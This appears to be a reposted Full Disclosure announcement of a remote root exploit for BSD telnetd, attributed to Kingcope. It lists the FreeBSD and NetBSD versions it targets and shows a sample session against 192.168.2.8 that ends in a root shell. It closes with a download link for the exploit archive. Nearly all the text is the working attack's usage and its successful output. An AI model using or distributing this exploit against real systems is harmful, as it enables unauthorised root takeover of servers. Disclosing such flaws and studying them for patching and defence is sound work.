BSD telnetd Remote Root Exploit

1. This exploit was leaked on the Full Disclosure mailing list:
2.  
3. http://seclists.org/fulldisclosure/2012/Jun/404
4.  
5.  
6. BSD telnetd Remote Root Exploit *ZERODAY*
7. By Kingcope
8. Year 2011
9.  
10. usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
11. [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
12. src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
13. [port]]
14. TARGETS:
15. 0 FreeBSD 8.2 i386
16. 1 FreeBSD 8.0/8.1/8.2 i386
17. 2 FreeBSD 7.3/7.4 i386
18. 3 FreeBSD 6.2/6.3/6.4 i386
19. 4 FreeBSD 5.3/5.5 i386
20. 5 FreeBSD 4.9/4.11 i386
21. 6 NetBSD 5.0/5.1 i386
22. 7 NetBSD 4.0 i386
23. 8 FreeBSD 8.2 amd64
24. 9 FreeBSD 8.0/8.1 amd64
25. 10 FreeBSD 7.1/7.3/7.4 amd64
26. 11 FreeBSD 7.1 amd64
27. 12 FreeBSD 7.0 amd64
28. 13 FreeBSD 6.4 amd64
29. 14 FreeBSD 6.3 amd64
30. 15 FreeBSD 6.2 amd64
31. 16 FreeBSD 6.1 amd64
32. 17 TESTING i386
33. 18 TESTING amd64
34. Trying 192.168.2.8...
35. Connected to 192.168.2.8.
36. Escape character is '^]'.
37. Trying SRA secure login:
38. *** EXPLOITING REMOTE TELNETD
39. *** by Kingcope
40. *** Year 2011
41. USING TARGET -- FreeBSD 8.2 amd64
42. SC LEN: 30
43. ALEX-ALEX
44. 6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
45. USER TTY FROM LOGIN@ IDLE WHAT
46. kcope pts/0 192.168.2.3 6:32PM 4 _su (csh)
47. FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
48. 02:41:51 UTC 2011
49. root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
50. uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
51.  
52. Exploit: http://www.exploit-db.com/sploits/19520.zip